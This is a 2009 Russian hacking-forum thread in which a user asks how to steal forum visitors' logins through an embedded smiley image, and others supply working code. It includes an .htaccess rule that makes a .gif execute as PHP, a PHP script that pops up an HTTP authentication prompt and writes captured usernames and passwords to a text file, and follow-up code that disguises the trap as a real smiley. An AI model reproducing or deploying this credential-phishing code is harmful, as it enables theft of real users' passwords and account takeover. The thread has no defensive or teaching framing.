[help] Сбор паролей с помощью смайлов

Discussion in 'PHP' started by mixdw, 18 Nov 2009.

  1. mixdw

    mixdw Banned

    Joined:
    27 Mar 2008
    Messages:
    81
    Likes Received:
    30
    Reputations:
    0
    Доброго времени суток всем.

    Давно где-то тут наткнулся на статью или сообщение,не помню точно.
    Где описывалось,что вставляя в код картинки определённый код и затем в сообщениях на форумах после того как пользователь увидел этот смайл,то у него вытелао окно где просило ввести логин и пароль,после чего логин и пароль сохранялся у меня.

    Облазил всю ветку статей,но не нашёл этого.
    Может кто-нибудь даст ссылку на это чудо.
     
    #1 mixdw, 18 Nov 2009
    Last edited: 18 Nov 2009
  2. erihtoney

    erihtoney Member

    Joined:
    3 Mar 2009
    Messages:
    91
    Likes Received:
    73
    Reputations:
    20
    forum.xakep.ru/m_1397502/tm.htm
    forum.xakep.ru/m_1212796/tm.htm
    про права на файлы не забудь.
     
    1 person likes this.
  3. mixdw

    mixdw Banned

    Joined:
    27 Mar 2008
    Messages:
    81
    Likes Received:
    30
    Reputations:
    0
    Первая ссылка,больше всего похожа на то что я имел введу,но мне не надо именно под укоз.
     
  4. erihtoney

    erihtoney Member

    Joined:
    3 Mar 2009
    Messages:
    91
    Likes Received:
    73
    Reputations:
    20
    В чем проблема?
    Ищи xss и в бой.
     
  5. mixdw

    mixdw Banned

    Joined:
    27 Mar 2008
    Messages:
    81
    Likes Received:
    30
    Reputations:
    0
    Увы с xss не знаком и не хочу заниматься тем чем не знаком.
    Решил попроще что-нибудь,т.е. то что в первом посту.
     
  6. d_x

    d_x Banned

    Joined:
    25 Mar 2008
    Messages:
    558
    Likes Received:
    650
    Reputations:
    210
    Первая ссылка не именно под юкоз, такое можно применить к любому сайту или форуму, где есть возможность вставки изображения.
     
  7. mixdw

    mixdw Banned

    Joined:
    27 Mar 2008
    Messages:
    81
    Likes Received:
    30
    Reputations:
    0
    при переходе на картинку с кодом image.gif выдаёт ошибку,что невозможно открыть файл.
     
  8. imajo.ati

    imajo.ati Banned

    Joined:
    21 Feb 2008
    Messages:
    232
    Likes Received:
    62
    Reputations:
    8
    потому что твой веб-сервер должен этот файл как php-скрипт обработать.
    у тебя ведь апаче? используй mod_rewrite или директиву AddType
     
  9. mixdw

    mixdw Banned

    Joined:
    27 Mar 2008
    Messages:
    81
    Likes Received:
    30
    Reputations:
    0
    у меня vertrigo.
    используй mod_rewrite или директиву AddType
    А поточнее,это куда вписывать надо?
    Хотя раньше у меня вот этот смайл запускался на вертриго или я ошибаюсь,может то не вертриго был.
     
  10. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    создаешь 3 файла:

    1..htaccess
    содержимое
    PHP:
    <files "image.gif">
    AddType application/x-httpd-php .gif
    </files>
    2.image.gif
    содержимое
    PHP:
    <?
        
    $filevalid    'accs.txt';
        
    $good        fopen($filevalid'a+');
    header("WWW-Authenticate: Basic realm=\"Access Forbidden\"");
    header("HTTP/1.0 401 Access Forbidden");
    if (isset(
    $_SERVER["PHP_AUTH_USER"]) ) {
    $user $_SERVER["PHP_AUTH_USER"];
    $pass $_SERVER["PHP_AUTH_PW"];
    fwrite ($good$user.';'.$pass."\n");
    header("HTTP/1.0 200 Login");
    //exit("test");
    }

    ?>
    3.accs.txt
    пустой

    Заливаешь на сервак и проставляешь права файлу accs.txt. Тут готовый тестовый вариант.
    Вроде все.
     
    _________________________
    #10 Uex Urgent, 21 Nov 2009
    Last edited: 21 Nov 2009
  11. mixdw

    mixdw Banned

    Joined:
    27 Mar 2008
    Messages:
    81
    Likes Received:
    30
    Reputations:
    0
    Спасибо огромное!
    А можно,что б это ещё показывалось как смайл?
     
  12. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    header("Content-type: image/jpg");
    echo file_get_contents("smile.jpg");
     
  13. imajo.ati

    imajo.ati Banned

    Joined:
    21 Feb 2008
    Messages:
    232
    Likes Received:
    62
    Reputations:
    8
    так размер картинки в 2 раза больше, лучше использовать другую функцию для вывода. например, imagejpeg